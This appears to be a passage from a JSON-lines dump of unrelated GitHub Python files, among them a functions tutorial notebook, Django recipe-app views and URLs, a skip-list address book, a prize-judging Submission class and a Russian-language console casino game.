that shouldn't be part of the inner function.\n\n# In[83]:\n\n\ndata = 5\ndef myfunc1():\n #global data\n data = 10\n print(\"Data1: \",data)\n def myfunc2():\n nonlocal data\n #global data\n data = 20\n print(\"Data2: \",data)\n myfunc2() \n \n print(\"Data3: \",data)\n return data\n\nprint(\"Data4: \",myfunc1())\nprint(\"Data5:\",data)\n\n\n# In[84]:\n\n\ndata = 5\ndef myfunc1():\n #global data\n #nonlocal data\n data = 10\n print(\"Data1: \",data)\n return data\nprint(\"Data2: \",myfunc1())\nprint(\"Data3:\",data)\n\n\n# In[1]:\n\n\ndef myfunc1():\n data = 10\n print(\"Data1: \",data)\n def myfunc2():\n #nonlocal data\n data = 20\n print(\"Data2: \",data)\n def myfunc3():\n nonlocal data\n data = 30\n print(\"Data3: \",data)\n myfunc3()\n print(\"Data5: \",data)\n myfunc2() \n print(\"Data6: \",data)\n return data\n\nprint(\"Data7: \",myfunc1())\n\n\n# # Recursive function\n# Function call itself for sepecified time.\n\n# In[88]:\n\n\n\"\"\" Recursive function\"\"\"\ndef factorial(n):\n if n == 0: \n return 1\n else: \n return(n*factorial(n-1)) \n \nprint(\"Factorial of 4 is :\",factorial(4))\nprint(\"Factorial of 5 is :\",factorial(5))\n\n\n# # Anonymous functions or lambda functions\n\n# Sometimes we declare a function without giving it a name; \n# these functions are known as anonymous functions or lambda functions.\n# * lambda Function: defined by \"lambda\" keyword\n# * lambda argument_list : expression\n# * Example: lambda x:x*x\n\n# In[86]:\n\n\n\"\"\"Example of lambda function (with single parameter)\"\"\"\nmyF=lambda n:n*n \n\n#print(\"The Square of 4 is :\", myF (4))\nprint(\"The Square of 5 is :\", myF (5))\n#print(\"The Square of XX is :\", myF (4,5))\n\n\n# In[94]:\n\n\n\"\"\"Example of lambda function (with more than one parameter)\"\"\"\nmyF=lambda a,b: a**b \n\nprint(\" 2 to the power 4:\", myF (2,4))\nprint(\" 3 to the power 2:\", myF (3,2))\n#print(\" X to the power X:\", myF (3))\n\n\n# In[88]:\n\n\ndef myfunc():\n x = 4\n result = (lambda n: x ** n) # x is remembered \n return result\n\n# object of myfunc is defined, and objecr value is used to access the lamda\nvalue = myfunc()\nprint(\"The output is: \",value(2)) # n = 2, input of lambda\n\n\n# In[94]:\n\n\ndef myFunction():\n data = []\n for i in range(10): # Use defaults instead\n data.append(lambda x, i=i: i ** x) # Remember i\n return data\nvalue = myFunction()\n#print(value)\nvalue[2](10) # i = 3, x = 2\n\n\n# # Notes on lambda function\n# 1. We may build very brief code with lambda functions. \n# 2. It improves the readability of the programme.\n# 3. No explicit returns statement is required.\n# 4. Using lambda function we can pass function as argument to another function. \n\n# In[95]:\n\n\n# More examples of lambda in list\nmyList = [lambda x: x + 1, lambda x: x - 1, lambda x: x ** 0.5, lambda x: x**2] \nfor f in myList:\n print(\"The values are: \",f(5))\n\nprint(\"The last result is: \",myList[2](5)) \n# 0: inc, 1: Dec, 2: SRoot, 3: Square\n\n\n# In[99]:\n\n\n# More examples of lambda in dictionary\nmyList = {'Inc':(lambda x: x + 1), \n 'Dec':(lambda x: x - 1), \n 'SRoot': (lambda x: x ** 0.5)}\n\nfor f in myList:\n print(\"The value of\", f, \"is: \",myList[f](4))\n\n#print(\"The last result is: \",myList[0](3)) \n# 0: inc, 1: Dec, 2: SRoot\n\n\n# # Lambda with filter\n# The filter() function is used to filter values \n# (based on some condition)from the given sequence. \n# Syntax: filter(function,sequence)\n\n# In[100]:\n\n\n\"\"\"Lambda with filter\"\"\"\ndata = range(10) \nLFF1 = list(filter(lambda x:x%2==0,data)) # filter(function,sequence)\nLFF2 = list(filter(lambda x:x>=5,data))\n\nprint(\"Print even numbers: \",LFF1)\nprint(\"List value square: \",LFF2)\n\n\n# # Lambda with map() function\n# For every data present in the given sequence, apply some functionality and generate new dataset with the required modification.\n# \n# syntax: map(function,sequence)\n# \n\n# In[98]:\n\n\n\"\"\"Lambda with map() function (Example 1)\"\"\"\ndata=range(5) \nX=list(map(lambda x:x**2,data)) \n\nprint(\"Square the value: \",X) \n\n\n# In[105]:\n\n\n\"\"\"Lamda with map() function (Example 2)\"\"\"\ndata1=range(5)\ndata2=range(6,10) \nX=list(map(lambda x,y:x**y,data1, data2)) \n\nprint(\"data1 square data2: \",X)\n\n\n# # Lamda with reduce() function\n# It reduces sequence of elements into a single element by applying some function.\n# \n# syntax: reduce(function,sequence)\n\n# In[107]:\n\n\nfrom functools import * \ndata=[2, 1, 4, 3] \nresult=reduce(lambda x,y:x+y,data) \nprint(\"The reduce resulty is: \",result) \n\n\n# # Function Aliasing\n# Renaming a function\n\n# In[112]:\n\n\ndef addMy(x,y): \n print(\"Addition is:\",x+y) \n \nsumMy=addMy\n\nprint(\"The id is: \",id(sumMy(2,6))) \nprint(\"The id is: \",id(addMy(4,5))) \n \nsumMy(2,6)\n#del addMy\n#addMy(10, 12)\n#sumMy(10,6)\n\n\n# If we delete a function still we can access that function using alias name.\n# * Syntax to delete: del sumMy\n\n# # Nested Functions\n# declare a function inside another function\n\n# In[113]:\n\n\n\"\"\"Nested function example\"\"\"\n\ndef outerF(): \n print(\"outer function initiated _1\") \n \n def innerF(): \n print(\"Inside the inner function _3\") \n \n print(\"outer function called inner function _2\") \n innerF() # Calling inside the outer Function\n\n#inner() # Calling outside the outer Function\nouterF()\n\n\n# # Functions are first-class objects\n# Everything in Python is viewed as an object. In Python, functions are first class objects since they can refer to, pass to variables, and return from other functions.\n# \n# The function can also be called, supplied as a variable, and returned from other functions.\n# \n# The functions can be declared inside another function and supplied to it as an argument.\n\n# # Passing function as argument to another function\n\n# In[114]:\n\n\n\"\"\"Example 1: Passing function as argument to another function\"\"\"\ndata=[1,2,3, 5, 6] \ndef mySquare(x):\n return x**2\n\nresult=list(map(mySquare,data))\nprint(\"Passing a function:\",result)\n\n\n# In[115]:\n\n\n#Example 2: Functions can return another function\ndef OuterAdder(x):\n print(\"The x value is:\",x)\n def InnerAdder(y): # Inner function\n print(\"The y value is:\",y)\n return x+y\n \n return InnerAdder # Returning InnerAdder as argument\n \naddingValues = OuterAdder(5) # The x value is 5, # Assign function object\n#print(\"\\nPrinting addingValues:\\n\",addingValues)\nfinalResult = addingValues(10) # The x value is 5, the y value is 10\nprint(\"The final result:\",finalResult)\nfinalResult = addingValues(13) # The x value is 5, the y value is 10\nprint(\"The final result:\",finalResult)\n\n\n# In[123]:\n\n\n#Example 3: Function returning another function\ndef outerF(num):\n def even():\n print(\"The\", num, \"is an even number\")\n\n def odd():\n print(\"The\", num, \"is an odd number\")\n\n if num%2 == 0:\n return even\n else:\n return odd\ntest = outerF(10) # Assign function object \ntest() # Call the function\n\ntest = outerF(13) \ntest()\n\n\n# In[124]:\n\n\n#Example 4: Function returning another function\ndef outer(x):\n if x%2 == 0:\n def inner1():\n print(x,\"is an even number\")\n return inner1\n else:\n def inner2():\n print(x,\"is an odd number\")\n return inner2\n return outer\n \nx = outer(10)\nx()\nx = outer(13)\nx()\nouter(11)()\n\n\n# # Closure or factory function\n# Depending on whom you ask, this sort of behavior is also sometimes called a closure or factory function. \n\n# In[73]:\n\n\ndef outer(x):\n def inner(a): \n return a ** x # retains x from enclosing scope\n return inner\n\nf1 = outer(2) # x = 2, object of the outer function is created\nresult1 = f1(3) # a = 3, Accessing the inner function, since outer holds inner \nprint(\"Result 1: \",result1) # 3^2 = 9\n\nf2 = outer(4) # x = 4, In this case x = 4\nresult2 = f2(3) # a = 3, \nprint(\"Result 2: \",result2) # 3^4 = 81\nprint(\"Each call to make Inner creates a new instance (here value of a) of this function, but each instance has a link to a different binding of variable\")\n\n\n# # Decorator function\n# * A decorator takes a function as an argument and extends its functionality, returning a modified function with the enhanced functionality.\n# * The fundamental goal of decorator functions is to allow us to increase the functionality of existing functions without having to change them.\n# *It allows programmers to change a function behaves.\n# *In Decorators, functions are passed as an parameter into another function and then called inside the wrapper function.\n# *It is also known as \"meta programming\". Here one portion of a programme tries to change another component of the programme at compile time.\n\n# # Higher Order Function\n# A function that accepts other function as an argument is called \n# higher order function.\n# \n\n# In[45]:\n\n\n\"\"\"Example of higher order function\"\"\"\ndef Inc(x): \n return x+1 \ndef Dec(x): \n return x-1\n\ndef operation(func, x): # func is a function, passing as parameter \n cal = func(x) \n return cal \n\nprint(\"The incremented operator: \",operation(Inc,10)) \nprint(\"The decremented operator: \",operation(Dec,10)) \n\n\n# In[116]:\n\n\ndef divide(x,y): \n print(\"The result is: \",x/y) \n \ndef outerDiv(func): \n def inner(x,y): \n if y != 0: \n return func(x,y) \n return inner\n \ndivideResult1 = outerDiv(divide) \ndivideResult1(2,4)\n\n\n# In[119]:\n\n\ndef outer_div(func): \n def inner(x,y):\n if y != 0: \n return func(x,y)\n else:\n print(\"y should not be 0\")\n return inner\n\n# decorators wrap a function, modifying its behavior.\n@outer_div \ndef divide(x,y): \n print(\"The result is: \",x/y)\n\ndivide(2,4) \ndivide(6,2)\ndivide(5,0)\n\n# Can we wrap another function??\n\n\n# In[124]:\n\n\n# More than one decorators\ndef display(func):\n def inner(x,y):\n print(\"\\nThe value of x is\",x,\"& the value of y is\",y)\n return func(x,y)\n return inner\n \ndef outer_div(func): \n def inner(x,y):\n if y != 0: \n return func(x,y)\n else:\n print(\"y should not be zero!\") \n return inner\n\n@outer_div\n@display\ndef divide(x,y): \n print(\"The result is: \",x/y)\n\ndivide(2,4) \ndivide(6,2)\ndivide(5,0)\n\n\n# In[2]:\n\n\n# More than one decorators\ndef mul(func):\n def inner(x,y):\n print(\"\\nThe value of x is\",x,\"& the value of y is\",y)\n print(\"Multiplication is: \", x*y)\n return func(x,y)\n return inner\n \ndef div(func): \n def inner(x,y):\n if y != 0: \n print(\"The division is: \",x/y)\n return func(x,y)\n else:\n print(\"y should not be zero!\") \n return inner\n\n@mul\n@div\ndef evaluate(x,y): \n print(\"Evaluation is done!\")\n\nevaluate(2,4) \nevaluate(6,2)\nevaluate(5,0)\n\n\n# # Generator Function\n# It is similar to the normal function defined by the def keyword and uses a yield keyword instead of return. \n\n# In[45]:\n\n\n#Example 1\ndef myYield(): \n str1 = \"First time\" \n yield str1 \n \n str2 = \"Second time\" \n yield str2 \n \n str3 = \"Third time\" \n yield str3 \n \nobj = myYield() \nprint(next(obj)) \nprint(next(obj)) \n#print(next(obj)) \n\n\n# In[48]:\n\n\n#Example 2\n#n=1\ndef myGen():\n n = 1\n n+=2\n yield n\n \n n+=2\n yield n \n \n n+=2\n yield n\n \noutput=myGen()\nprint(next(output))\nprint(next(output))\nprint(next(output))\n\n\n# # Loop with Generator Function\n\n# In[54]:\n\n\n# Example 3\ndef myGen(x):\n for i in range(x):\n yield i\n \nmySeq = myGen(3) # x = 3 \nprint(next(mySeq))\nprint(next(mySeq))\nprint(next(mySeq))\n#print(next(mySeq))\n\n\n# # Handling the StopIteration error\n\n# In[55]:\n\n\n# Example 4, Handling the StopIteration error using try and except\ndef myGen(x):\n for i in range(1,x):\n yield i\n \nmySeq = myGen(6) # x = 6 \n\nwhile True:\n try:\n print (\"Received on next(): \", next(mySeq))\n except StopIteration:\n break\n\n\n# In[5]:\n\n\n# Example 5, Handling the StopIteration error without try and except\ndef myFun1(x): \n for i in range(0,5): \n yield x**i \n\n \nfor n in myFun1(2): # x = 2, 2^i\n print(n) \n\n\n# # Difference between Generator function and Normal function\n# 1. Normal function contains only one return statement where as generator function can contain one or more yield statements.\n# 2. Local variable and their states are remembered between successive calls.\n\n# In[60]:\n\n\n# Example 6: fibonacci using function generator\ndef fibonacciGenerator():\n n1=0; n2=1\n while True:\n yield n1\n n1, n2 = n2, n1 + n2\n \nfibSeq= fibonacciGenerator()\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\nprint(next(fibSeq))\n#print(next(fibSeq))\n#print(next(fibSeq))\n\n\n# # Generator Expression\n# * (x*x for x in range(n)) is a generator expression \n# * The first part of an expression is the yield value \n# * The second part is the for loop with the collection\n\n# In[63]:\n\n\n# Example 7: (Generator Expression is same as lambda function)\nlist = [1,2,3,4] \n \nz = (x**0.5 for x in list)\nprint(\"Output of generator function: \",next(z)) \nprint(\"Output of generator function: \",next(z))\nprint(\"Output of generator function: \",next(z))\n#print(x)\n\n\n# # List comprehension Vs Generator Expression\n\n# In[64]:\n\n\n[x**2 for x in range(5)] #List comprehension\n\n\n# In[66]:\n\n\nGE = (x**2 for x in range(5)) #Generator Expression\nnext(GE)\nnext(GE)\nnext(GE)\n\n\n# # Generate Infinite Sequence\n\n# In[69]:\n\n\n# Example 8: Generate Infinite Sequence\ndef iS(): \n n = 0 \n while True: \n yield n \n n += 1 \n \n#for i in iS(): \n# print(i) \n\n","repo_name":"TheAcademcian/Python","sub_path":"Function/Function.py","file_name":"Function.py","file_ext":"py","file_size_in_byte":23549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19650168136","text":"\"\"\"Command-line interface for github_release_fetcher.\"\"\"\nimport click\n\nfrom . import __version__, github\n\n\n@click.command()\n@click.option(\n \"--owner\",\n help=\"Organisation of the Github repository\",\n required=True,\n)\n@click.option(\n \"--repository\",\n help=\"Github repository\",\n required=True,\n)\n@click.version_option(version=__version__)\ndef main(owner: str, repository: str) -> None:\n \"\"\"The Github releases fetcher tool.\"\"\"\n data = github.latest_release(owner=owner, repository=repository)\n\n version = data.tag_name\n\n click.echo(\"Version: {}\".format(version))\n click.echo(\"Assets:\")\n for asset in data.assets:\n click.echo(asset)\n","repo_name":"pziggo/github-release-fetcher","sub_path":"github_release_fetcher/console.py","file_name":"console.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38235136208","text":"import json\nfrom django.http.response import HttpResponseRedirect\nimport requests\nimport logging\nfrom os import sync\n\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import context\nfrom recipeapp.forms.recipe import ReviewForm\nfrom django.core.mail import send_mail\nfrom recipeapp.models.models import LNmpesaOnline, Recipe, Review, UserProfile\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\n\nfrom recipeapp.views.mpesa_credentials import LipanaMpesaPpassword, MpesaAccessToken\n\ndef home(request):\n \n try:\n query = request.GET.get('q') \n recipes=Recipe.search(query)\n print(query)\n context={\n 'recipe':recipes,\n \n }\n \n except:\n if request.user.id:\n \n profile=UserProfile.objects.get(user_id=request.user.id)\n phone=profile.PhoneNumber\n phone=str(phone)\n print(phone)\n phone=phone[1:]\n phone=str(phone)\n pre='254'\n phone=(pre+phone)\n upgrade=LNmpesaOnline.objects.filter(PhoneNumber=profile.PhoneNumber,Amount=1.0)\n recipe=Recipe.objects.all().order_by('created_at').reverse()\n print(upgrade) \n \n\n \n \n recipe=Recipe.objects.all().order_by('created_at').reverse()\n \n context={\n 'recipe':recipe,\n 'upgrade':upgrade,\n }\n else:\n recipe=Recipe.objects.all().order_by('created_at').reverse()\n \n context={\n 'recipe':recipe,\n \n }\n\n \n \n return render(request,'home/home.html',context)\ndef filter_recipes(request,what):\n recent=Recipe.filter_by_recent()\n ratings=Recipe.filter_by_rating()\n country=Recipe.filter_by_country()\n all=Recipe.objects.all().order_by('created_at').reverse()\n if what=='recent':\n context={\n 'recipe':recent\n }\n elif what=='ratings':\n context={\n 'recipe':ratings\n }\n elif what=='country':\n context={\n 'recipe':country\n }\n else:\n context={\n 'recipe':all\n }\n return render(request ,'home/home.html',context)\n\n\n \n \n \n \n return render(request,'home/home.html',context)\n\n\ndef viewpage(request,recipe_id):\n \"\"\"\n Displays a detailed view of the recipes as specified in the URL.\n \"\"\"\n profile=UserProfile.objects.get(user_id=request.user.id)\n phone=profile.PhoneNumber\n \n upgrade=LNmpesaOnline.objects.filter(PhoneNumber=profile.PhoneNumber,Amount=1.0)\n form=ReviewForm()\n recipe = get_object_or_404(Recipe, pk=recipe_id)\n if recipe.free==True or len(upgrade)>0:\n ingredients = recipe.ingredient_set.order_by('-index')\n directions = recipe.direction_set.order_by('-index')\n comments=Review.objects.filter(recipe=recipe_id)\n context = {\n 'recipe': recipe,\n 'ingredients': ingredients,\n 'directions': directions,\n 'form':form,\n 'comments':comments\n \n }\n else:\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n return render(request,'core/rec_details.html',context)\n@login_required()\ndef user_dashboard(request):\n return render(request, 'home/dashboard.html')\n","repo_name":"stephane-evrard/RecipeAppGroup","sub_path":"recipeapp/views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36162940265","text":"import json\nimport itertools\n\n\ndef process_districts(data):\n for province in data:\n yield [\n {'disctrict_name': district.get('name'),\n 'district_code': district.get('code'),\n 'province_code': province.get('code')}\n for district in province.get('districts')\n ]\n\n\nwith open('data/vietnam_nested.json', 'r') as f:\n data = json.load(f)\n list_district = process_districts(data)\n for item in itertools.islice(list_district, 0, 5):\n print(list(item))\n","repo_name":"boconlonton/dataset-init-sb","sub_path":"src/districts.py","file_name":"districts.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12499419316","text":"from django.urls import path, include\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.views import LogoutView\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('tutors/', views.tutors, name='tutors'),\n path('about/', views.about, name='about'),\n path('signup/', views.signup, name='signup'),\n path('register/', views.tutorregistration, name='tutorreg'),\n path('register/results', views.addClasses, name='addClasses'),\n path('profile/', views.profile, name='view_profile'),\n path('edit_profile/', views.edit_profile, name='editprofile'),\n path('editprof/', views.editprof, name='edit_prof'),\n path('tutorInfo/', views.tutor_info, name='tutorinfo'),\n path('review/', views.writeReview, name='review'),\n path('confirmation/', views.confirmation, name='confirmation'),\n path('addClass/', views.justAddClasses,name='classreg'),\n path('addClass/results', views.addClassPrivate, name='addClassPrivate'),\n path('removeClass/', views.deleteClass, name=\"removeClass\"),\n\n #For Google Login\n path('login/', views.login, name='login'),\n path('accounts/', include('allauth.urls')),\n path('logout', LogoutView.as_view()),\n path('test/',views.hasAccount,name=\"test\"),\n path('makeNewTutor/',views.makeNewTutor,name=\"MakeNewTutor\"),\n path('makeNewStudent/',views.makeNewStudent,name=\"MakeNewStudent\"),\n path('showtype/',views.showTutorOrStudent,name=\"ShowType\"),\n path('populate/',views.Populate,name=\"Populate\"),\n path('availability/',views.tableAval, name=\"table\"),\n path('storeCheckedBoxes/',views.storeCheckedBoxes, name='storeCheckedBoxes'),\n path('showAval/', views.showAval, name=\"ShowAvailability\"),\n path('saverequest/', views.StoreRequest,name=\"StoreRequest\"),\n path('showRequests/', views.ShowRequests,name=\"Show Requests\"),\n path('showRequestsTutor/', views.ShowRequestsTutor,name=\"Show Requests Tutor\"),\n path('showRequestsStudent/', views.ShowRequestsStudent,name=\"Show Requests Student\"),\n path('DeleteRequest/', views.DeleteRequest, name=\"Delete Request\"),\n path('AcceptRequest/',views.AcceptRequest,name=\"Accept Request\"),\n path('CancelRequest/',views.CancelRequest, name='Cancel Request'),\n path('EndRequest/', views.EndRequest, name='End Request'),\n path('afterlogin/', views.afterLogin, name='After Login'),\n path('editAvail/', views.editAvail, name=\"Edit Availability\"),\n path('storeEditedAvail/', views.storedEditedBoxes, name=\"Store Edited Boxes\")\n]","repo_name":"abbykrug/ASDProj","sub_path":"tutoroos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32209401624","text":"from Node import Node\nimport numpy as np\n\n#This class can be ran using driver.py.\n#Running this class using driver.py will confirm \n#that our implementation of the \n#Skip List data structure works.\n\nclass SkipList:\n head:Node\n temp:Node\n\n\n def __init__(self):\n self.head = Node(\"\", \"\", 0)\n self.temp = None\n \n #The insert method adds a new contact \n #(represented by a new node) to the\n #Skip List.\n #\n #Parameters:\n #1. Takes a String representing the name of the contact \n #we want to insert into the Skip List.\n #2. Takes a String representing the email of the contact \n #we want to insert into the Skip List.\n #\n #Returns: no return value.\n def insert(self, personName, personEmail):\n self.temp = None\n #get the number of levels to insert the new contact at \n numLevels:int = self.getNumLevelsToInsertAt()\n #create any additional levels if necessary\n self.insertingNewLevels(numLevels)\n tempInsertNode = self.head\n\n while (tempInsertNode is not None):\n \n #if we want to place the new contact \n #at the end of the list of nodes at a given level\n if (tempInsertNode.nextNode is None) and tempInsertNode.name < personName:\n #if we are a level less than or equal to\n #the number of levels that we will insert the contact\n #at, create a new node to represen the new contact\n if tempInsertNode.level <= numLevels:\n self.createNewNode(tempInsertNode, None, personName, personEmail)\n\n #traverse down 1 level\n tempInsertNode = tempInsertNode.downNode\n\n #if we want to place the new contact at in the middle of the list of nodes at a given level\n elif tempInsertNode.name < personName and tempInsertNode.nextNode.name > personName: \n #if we are a level less than or equal to\n #the number of levels that we will insert the contact\n #at, create a new node to represen the new contact \n if tempInsertNode.level <= numLevels:\n self.createNewNode(tempInsertNode, tempInsertNode.nextNode, personName, personEmail)\n \n #traverse down 1 level\n tempInsertNode = tempInsertNode.downNode\n\n #if we have not found the correct place to insert the new contact at a given level\n elif tempInsertNode.name < personName and tempInsertNode.nextNode.name < personName:\n #traverse forward 1 node\n tempInsertNode = tempInsertNode.nextNode\n \n\n #create a new node between the current node, given by currentNode, and the \n #node after the current node, given by nextNodeAfter\n def createNewNode(self, currentNode, nextNodeAfter, personName, personEmail):\n #personName and personEmail represent the name and email of the new contact\n newNode:Node = Node(personName, personEmail, currentNode.level)\n newNode.nextNode = nextNodeAfter\n currentNode.nextNode = newNode\n \n if self.temp is not None:\n self.temp.downNode = newNode\n \n self.temp = newNode\n\n\n #creating new levels if the current number \n #of levels is less than the number of levels\n #that we want to insert the new contact at\n def insertingNewLevels(self, numLevels):\n if numLevels > self.head.level:\n startInsertion:int = self.head.level + 1 \n for i in range(startInsertion, numLevels + 2):\n newLevelNode:Node = Node(\"\", \"\", i)\n newLevelNode.downNode = self.head\n self.head = newLevelNode\n\n \n #simulates a set of coin flips and returns\n #the number of consecutive \"heads\" flipped \n #in a row\n def getNumLevelsToInsertAt(self) -> int:\n probHeads:float = 0.5\n count:int = 0\n while np.random.rand() < probHeads:\n count += 1\n return count\n\n #The search method finds an existing contact \n #(represented by a single node) to the\n #Skip List.\n #\n #Parameters:\n #1. Takes a String representing the name of the contact \n #we want to insert into the Skip List.\n #\n #Returns: \n #If there is a node in the Skip List containing the\n #name of the contact that we are looking for, return that node.\n #Else, return None.\n def search(self, personName):\n self.count = 0\n nodeToReturn:Node = None\n tempFindNode = self.head\n found:bool = False\n \n while (tempFindNode is not None) and found == False:\n \n #if we are at the lowest level and the current node has the same name \n #as the name we are looking for, return the current node\n if tempFindNode.level == 0 and tempFindNode.name == personName:\n nodeToReturn = tempFindNode\n found = True\n \n #if the current node and the next node in front of \n #it have names that are alphabetically ahead\n #of the contact we are looking for, \n #traverse forward by 1 node\n elif (tempFindNode.nextNode is not None) and tempFindNode.name < personName and tempFindNode.nextNode.name <= personName:\n tempFindNode = tempFindNode.nextNode\n \n #traverse down 1 level in all other cases\n else:\n tempFindNode = tempFindNode.downNode\n\n return nodeToReturn\n\n","repo_name":"chakra0501/addressBook","sub_path":"SkipList.py","file_name":"SkipList.py","file_ext":"py","file_size_in_byte":5569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"222633058","text":"'''\ncreate a Judge class that tracks name, keywords, and business flag and Submission class tracking ID, keywords, Judges\n'''\n\nimport math\n\nclass Submission():\n '''\n A class defining objects that represent prize submissions/applications, including data related to the relevant technical concepts/keywords describing the application and the submission ID.\n '''\n\n def __init__(self, submission_id, target_num_judges, min_num_flag_judges = 0):\n '''\n Constructor for Submission objects\n\n Parameters\n ----------\n submission_id: str. Name or some other identifier of the Submission being created.\n\n target_num_judges: int. The number of unique Judge objects that should be assigned to this Submission\n\n min_num_flag_judges: int. The minumum number of flagged judges (e.g. business-savvy judges) that must be assigned to this Submission. A value of 0 indicates that flags can be ignored (flagged Judge objects aren't treated as special compared to unflagged Judge objects).\n '''\n\n self.id = submission_id\n\n self.target_num = target_num_judges\n\n #In case min_num_flag_judges is actually float...\n self.min_num_flag = math.floor(min_num_flag_judges)\n\n self.assigned_judges = []\n self.flag_count = 0\n self.unflagged_count = 0\n\n\n def assign_judge(self, judge):\n\n '''\n Assigns Judge object to review this application/submission. Checks to make sure the Judge being assigned is the right kind (flagged vs. not) and that max number of Judges isn't exceeded.\n\n Parameters\n ----------\n judge: Judge object that represents the person you want to review Submission. \n '''\n\n #How many spots are still being held for flagged and unflagged judges?\n flagged_slots_left = self.min_num_flag - self.flag_count\n unflagged_slots_left = self.target_num - self.min_num_flag - self.unflagged_count\n\n #Make sure we haven't already assigned all the judges we need\n if len(self.assigned_judges) < self.target_num:\n #Are there any flagged judges required and \n #have we not hit that number yet?\n if self.min_num_flag > 0 and self.flag_count < self.min_num_flag:\n #Assign judge if flag = True and increment the counter\n if judge.flag:\n self.assigned_judges.append(judge.assign(self))\n self.flag_count += 1\n\n #Assign judge if there are non-flag slots left\n elif unflagged_slots_left > 0:\n self.assigned_judges.append(judge.assign(self))\n self.unflagged_count += 1\n\n #No unflagged slots left and Judge isn't flagged\n else:\n raise AssertionError(\"Judge doesn't satisfy Submission flag requirements\")\n\n #Assign judge, as flags don't matter\n else: \n self.assigned_judges.append(judge.assign(self))\n self.unflagged_count += 1\n else:\n raise AssertionError(\"Too many Judges assigned to this Submission\")\n\n\n def __str__(self): \n return f\"Submission ID: {self.id}\\nTarget Number of Judges: {self.target_num}\\nNumber of Assigned Judges: {len(self.assigned_judges)}\\nNumber of Assigned Flagged Judges: {self.flag_count}\\nNumber of Assigned Unflagged Judges: {self.unflagged_count}\"","repo_name":"emigre459/SolarPrize","sub_path":"Submission.py","file_name":"Submission.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19972650886","text":"from ctypes import *\nimport random\nimport time\n\nvaluta = \"$\"\nmoney = 0\ndefault_money = 10000\nwindll.Kernel32.GetStdHandle.restype = c_ulong\nh = windll.Kernel32.GetStdHandle(c_ulong(0xfffffff5))\nplayGame = True\n\n# ================================================================================\n\n# Вывод сообщения о выигрыше\ndef win(result):\n color(14)\n print(f\" Победа за тобой! *Ведьмаку заплатите чеканной монетой*: {result} {valuta}\")\n print(f\" У тебя на счету {money} {valuta}\")\n\n# Вывод сообщения о проигрыше\ndef loss(result):\n color(12)\n print(f\" К сожалению, проигрыш: {result} {valuta}\")\n print(f\" У тебя на счету {money} {valuta}\")\n\n# Чтение из файла оставшейся суммы\ndef load_money():\n try:\n f = open(\"money.dat\", \"r\")\n m = int(f.readline())\n f.close()\n except FileNotFoundError:\n print(f\"Файл не существует. Задано значение {default_money} {valuta}.\")\n m = default_money\n return m\n\n# Запись суммы в файл\ndef save_money(moneyToSave):\n try:\n f = open(\"money.dat\", \"w\")\n f.write(str(moneyToSave))\n f.close()\n except:\n print(\"Ошибка создания файла. Наше Казино закрывается!\")\n quit(0)\n\n# Установка цвета текста\ndef color(c):\n windll.Kernel32.SetConsoleTextAttribute(h, c)\n\n# Вывод на экран цветного, обрамленного звездочками текст\ndef colorLine(c, s):\n for i in range(30):\n print()\n color(c)\n print(\"*\" * (len(s) + 2))\n print(\"\" + s)\n print(\"*\" * (len(s) + 2))\n\n# Функция ввода целого числа\ndef getIntInput(minimum, maximum, message):\n color(7)\n ret = -1\n while ret < minimum or ret > maximum:\n st = input(message)\n if st.isdigit():\n ret = int(st)\n else:\n print(\" Введите целое число!\")\n return ret\n\n# Функция ввода значения\ndef getInput(digit, message):\n color(7)\n ret = \"\"\n while ret == \"\" or not ret in digit:\n ret = input(message)\n return ret\n\n# ================================================================================\n\n# Главный цикл\ndef main():\n global money, playGame\n\n money = load_money()\n start_money = money\n\n while playGame and money > 0:\n colorLine(10, \"Приветствую тебя в нашем заведении 'Азино 777' !\")\n color(14)\n print(f\" У тебя на счету {money} {valuta}.\")\n\n color(6)\n print(\" Ты можешь сыграть в:\")\n print(\" 1. Рулетка\")\n print(\" 2. Кости\")\n print(\" 3. Однорукий бандит\")\n print(\" 0. Выход. Ставка 0 в играх - выход\\n\")\n color(7)\n\n x = getInput(\"01234\", \" Твой выбор? \")\n if x == \"0\":\n playGame = False\n elif x == \"1\":\n roulette()\n elif x == \"2\":\n dice()\n elif x == \"3\":\n one_hand_bandit()\n\n\n colorLine(12, \"Жаль, что ты покидаешь нас! Возвращайся скорей!\")\n color(13)\n if money <= 0:\n print(\" Упс... Ты остался безе денег. Возьми микрокредит и возвращайся!\")\n\n color(11)\n if money > start_money:\n print(\"Ну что ж, поздравляю с прибылью!\")\n print(f\"На начало игры у тебя было {start_money} {valuta}.\")\n print(f\"Сейчас уже {money} {valuta}! Играй ещё и приумножай!\")\n elif money == start_money:\n print(\"Ты остался в нуле!\")\n print(f\"Сумма осталась такой же: {money} {valuta}\")\n print(\"В следующий раз все обязательно получится!\")\n else:\n print(f\"К сожалению, ты проиграл {start_money - money} {valuta}.\")\n print(\"В следующий раз все обязательно получится!\")\n\n save_money(money)\n\n color(7) # Устанавливаем цвет консоли на стандартный\n input(\"Нажми Enter, чтобы выйти...\")\n quit() # Выход\n\n# Анимация рулетки\ndef getRoulette(visable):\n tickTime = random.randint(100, 200) / 10000\n 